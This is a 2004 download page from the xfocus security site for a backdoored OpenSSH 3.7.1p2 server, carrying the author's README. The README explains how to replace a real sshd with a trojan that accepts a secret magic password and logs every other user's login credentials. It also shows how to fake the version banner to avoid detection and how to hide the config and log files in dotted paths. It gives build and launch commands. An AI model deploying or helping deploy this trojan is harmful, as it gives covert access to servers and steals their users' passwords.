xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
添加工具English Version

0x333openssh-3.7.1p2.tar.gz


提交时间:2004-08-27
提交用户:uki
工具分类:后门程序
运行平台:Unix/Linux
工具大小:801501 Bytes
文件MD5 :008690b0235471672d814b9db06d94f4

openssh后门版,还可以记录密码的
-----------------------------------------------------------------------------------------------------------------------------
openssh-3.7.1p2 backdoor by nsn.
credits djoser.
-----------------------------------------------------------------------------------------------------------------------------

This backdoor works in two modes, like a trojan and like a standard DAEMON.

in trojan mode you have to specify two options (if you don't specify these, works in NO TROJAN MODE):

-n file    path Configuration file
-s file    path Sniff output log file

format of configuration file have to be this:

hashMD5 (magic password)
openSSH fake version

e.g:

bda6faa04180e97ef40aaeab44a1fee1
SSH-1.99-OpenSSH_3.5p2

first line is a hash of key "nsn" in MD5, second line a fake version of DAEMON.
in this package will be incluse 0x333MD5hash-linux.c that generate password for you.

if you don't specify a version, by default is getted version openssh-3.7.1p2.

In sniff file will be logged all access except access with magic password, this can be nice, if you replace true sshd,
with this trojan and log all access of others users, and more you can fake version of old sshd, so nothing should be
changed.

-----------------------------------------------------------------------------------------------------------------------------

compiling:

-----------------------------------------------------------------------------------------------------------------------------
cd src
./configure --prefix=yourbackdir
make
make install
-----------------------------------------------------------------------------------------------------------------------------

when run daemon:

./sshd -p port -n conf -s sniff file

e.g:

./sshd -p 25000 -n /usr/src/.info/.cnf -s /usr/src/.info/.sh.pw

note: use complete path for configuration file and sniff file

backdoored sshd doesn't use defaults path, for -n and -s, is a your job touch it and generate it correctly.
* warning: when backdoor load conf, check that banner is getted good, else kill deamon and fix file conf.






-----------------------------------------------------------------------------------------------------------------------------
www.0x333.org
outsiders.
-----------------------------------------------------------------------------------------------------------------------------

>> 下载 <<